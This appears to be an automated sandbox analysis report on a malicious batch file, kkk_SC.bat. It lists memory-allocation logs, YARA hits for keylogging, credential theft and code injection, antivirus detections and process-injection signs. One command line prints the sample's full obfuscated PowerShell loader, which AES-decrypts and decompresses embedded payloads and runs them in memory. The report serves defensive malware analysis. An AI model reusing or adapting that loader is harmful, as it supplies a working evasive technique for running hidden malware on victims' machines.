NtAllocateVirtualMemory June 21, 2023, 7:46 a.m.	process_identifier: 2432 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02866000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 21, 2023, 7:46 a.m.	process_identifier: 2432 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02867000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 21, 2023, 7:46 a.m.	process_identifier: 2432 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02868000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 21, 2023, 7:46 a.m.	process_identifier: 2432 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02869000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 21, 2023, 7:46 a.m.	process_identifier: 2432 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0286a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 21, 2023, 7:46 a.m.	process_identifier: 2432 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0286b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 21, 2023, 7:46 a.m.	process_identifier: 2432 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0286c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 21, 2023, 7:46 a.m.	process_identifier: 2432 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0286d000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 21, 2023, 7:46 a.m.	process_identifier: 2432 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0286e000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 21, 2023, 7:46 a.m.	process_identifier: 2432 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0286f000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 21, 2023, 7:46 a.m.	process_identifier: 2432 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04980000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 21, 2023, 7:46 a.m.	process_identifier: 2432 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04981000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 21, 2023, 7:46 a.m.	process_identifier: 2432 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04982000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 21, 2023, 7:46 a.m.	process_identifier: 2432 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04983000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 21, 2023, 7:46 a.m.	process_identifier: 2432 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04984000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

Creates a shortcut to an executable file (1 event)

file	C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk

Creates a suspicious process (1 event)

cmdline

C:\Windows\system32\cmd.exe /K C:\Users\test22\AppData\Local\Temp\kkk_SC.bat

Checks for the Locally Unique Identifier on the system for a suspicious privilege (1 event)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW June 21, 2023, 7:46 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

Yara rule detected in process memory (50 out of 62 events)

description	Create a windows service	rule	Create_Service
description	Communication using DGA	rule	Network_DGA
description	Communications over RAW Socket	rule	Network_TCP_Socket
description	Communications use DNS	rule	Network_DNS
description	Steal credential	rule	local_credential_Steal
description	Code injection with CreateRemoteThread in a remote process	rule	Code_injection
description	Communications over HTTP	rule	Network_HTTP
description	PWS Memory	rule	Generic_PWS_Memory_Zero
description	Record Audio	rule	Sniff_Audio
description	Match Windows Http API call	rule	Str_Win32_Http_API
description	Match Windows Inet API call	rule	Str_Win32_Internet_API
description	Take ScreenShot	rule	ScreenShot
description	Escalate priviledges	rule	Escalate_priviledges
description	Communications over P2P network	rule	Network_P2P_Win
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerCheck__RemoteAPI
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	DebuggerException__ConsoleCtrl
description	(no description)	rule	DebuggerException__SetConsoleCtrl
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	(no description)	rule	Check_Dlls
description	Checks if being debugged	rule	anti_dbg
description	Anti-Sandbox checks for ThreatExpert	rule	antisb_threatExpert
description	Bypass DEP	rule	disable_dep
description	Affect hook table	rule	win_hook
description	Communications over FTP	rule	Network_FTP
description	Run a KeyLogger	rule	KeyLogger
description	File Downloader	rule	Network_Downloader
description	Create a windows service	rule	Create_Service
description	Communication using DGA	rule	Network_DGA
description	Communications over RAW Socket	rule	Network_TCP_Socket
description	Communications use DNS	rule	Network_DNS
description	Steal credential	rule	local_credential_Steal
description	Code injection with CreateRemoteThread in a remote process	rule	Code_injection
description	Communications over HTTP	rule	Network_HTTP
description	PWS Memory	rule	Generic_PWS_Memory_Zero
description	Record Audio	rule	Sniff_Audio
description	Match Windows Http API call	rule	Str_Win32_Http_API
description	Match Windows Inet API call	rule	Str_Win32_Internet_API
description	Take ScreenShot	rule	ScreenShot
description	Escalate priviledges	rule	Escalate_priviledges
description	Communications over P2P network	rule	Network_P2P_Win
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerCheck__RemoteAPI
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active

Uses Windows utilities for basic Windows functionality (2 events)

cmdline

C:\Windows\system32\cmd.exe /K C:\Users\test22\AppData\Local\Temp\kkk_SC.bat

cmdline

"C:\Users\test22\AppData\Local\Temp\kkk_SC.bat.exe" -w hidden -c $cWVj='EFSeJleFSeJmenFSeJtAFSeJtFSeJ'.Replace('FSeJ', '');$dZIP='CFSeJhFSeJangeFSeJExtFSeJenFSeJsioFSeJnFSeJ'.Replace('FSeJ', '');$SOzw='MaiFSeJnMoFSeJdFSeJuleFSeJ'.Replace('FSeJ', '');$iDET='LoFSeJaFSeJdFSeJ'.Replace('FSeJ', '');$CeaB='InvoFSeJkeFSeJ'.Replace('FSeJ', '');$bcLs='ReFSeJaFSeJdLiFSeJnesFSeJ'.Replace('FSeJ', '');$TFdr='EnFSeJtrFSeJyFSeJPoFSeJinFSeJtFSeJ'.Replace('FSeJ', '');$gkqN='TrFSeJaFSeJnsfoFSeJrFSeJmFinFSeJalBFSeJlFSeJocFSeJkFSeJ'.Replace('FSeJ', '');$bRfw='CreFSeJaFSeJtFSeJeFSeJDecrFSeJyFSeJptFSeJorFSeJ'.Replace('FSeJ', '');$UlBT='GetFSeJCuFSeJrreFSeJnFSeJtPFSeJroFSeJceFSeJssFSeJ'.Replace('FSeJ', '');$QNKP='FroFSeJmBFSeJasFSeJe6FSeJ4FSeJStrFSeJinFSeJgFSeJ'.Replace('FSeJ', '');$jAZR='SplFSeJitFSeJ'.Replace('FSeJ', '');function cPniz($bJbiy){$IQAHT=[System.Security.Cryptography.Aes]::Create();$IQAHT.Mode=[System.Security.Cryptography.CipherMode]::CBC;$IQAHT.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$IQAHT.Key=[System.Convert]::$QNKP('DG+ITvejSg5kAhhFMXGE41iyJquRkqJTsUyn5dcEHDA=');$IQAHT.IV=[System.Convert]::$QNKP('Joz0fUDJtUUf4xJ0M3JntQ==');$fKHZo=$IQAHT.$bRfw();$lpOTx=$fKHZo.$gkqN($bJbiy,0,$bJbiy.Length);$fKHZo.Dispose();$IQAHT.Dispose();$lpOTx;}function eyRdW($bJbiy){$OKYGT=New-Object System.IO.MemoryStream(,$bJbiy);$pEfSh=New-Object System.IO.MemoryStream;$cJnlK=New-Object System.IO.Compression.GZipStream($OKYGT,[IO.Compression.CompressionMode]::Decompress);$cJnlK.CopyTo($pEfSh);$cJnlK.Dispose();$OKYGT.Dispose();$pEfSh.Dispose();$pEfSh.ToArray();}$cqDqM=[System.Linq.Enumerable]::$cWVj([System.IO.File]::$bcLs([System.IO.Path]::$dZIP([System.Diagnostics.Process]::$UlBT().$SOzw.FileName, $null)), 1);$DZZNX=$cqDqM.Substring(2).$jAZR(':');$OIVsl=eyRdW (cPniz ([Convert]::$QNKP($DZZNX[0])));$VMVnP=eyRdW (cPniz ([Convert]::$QNKP($DZZNX[1])));[System.Reflection.Assembly]::$iDET([byte[]]$VMVnP).$TFdr.$CeaB($null,$null);[System.Reflection.Assembly]::$iDET([byte[]]$OIVsl).$TFdr.$CeaB($null,$null);

File has been identified by 12 AntiVirus engines on VirusTotal as malicious (12 events)

FireEye	Trojan.GenericKD.67626550
VIPRE	Trojan.GenericKD.67626550
Arcabit	Trojan.Generic.D407E636
ESET-NOD32	PowerShell/Agent.AUH
Avast	Other:Malware-gen [Trj]
BitDefender	Trojan.GenericKD.67626550
MicroWorld-eScan	Trojan.GenericKD.67626550
Emsisoft	Trojan.GenericKD.67626550 (B)
MAX	malware (ai score=82)
Microsoft	Trojan:Win32/Vigorf.A
GData	Trojan.GenericKD.67626550
AVG	Other:Malware-gen [Trj]

Resumed a suspended thread in a remote process potentially indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2192 resumed a thread in remote process 2256
NtResumeThread June 21, 2023, 7:46 a.m.	thread_handle: 0x00000088 suspend_count: 0 process_identifier: 2256	1	0	0

kkk_SC.bat

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All